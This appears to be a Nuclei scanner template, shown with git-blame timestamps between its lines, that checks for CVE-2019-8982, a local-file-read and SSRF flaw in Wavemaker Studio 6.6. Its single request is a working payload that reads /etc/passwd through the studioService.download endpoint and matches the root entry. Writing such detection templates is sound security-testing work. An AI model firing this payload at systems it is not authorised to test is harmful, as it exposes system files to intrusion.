2021-01-02 04:59:06 +00:00
|
|
|
id: CVE-2019-8982
|
2020-04-08 11:34:01 +00:00
|
|
|
info:
|
|
|
|
name: Wavemaker Studio 6.6 LFI/SSRF
|
|
|
|
author: madrobot
|
2020-05-25 07:49:06 +00:00
|
|
|
severity: high
|
2020-04-08 11:34:01 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"
|
2020-07-08 11:38:57 +00:00
|
|
|
matchers-condition: and
|
2020-04-08 11:34:01 +00:00
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
2020-05-25 07:49:06 +00:00
|
|
|
- 200
|
2020-04-08 11:34:01 +00:00
|
|
|
- type: regex
|
|
|
|
regex:
|
2020-05-25 07:49:06 +00:00
|
|
|
- "root:[x*]:0:0:"
|
2020-04-08 11:34:01 +00:00
|
|
|
part: body
|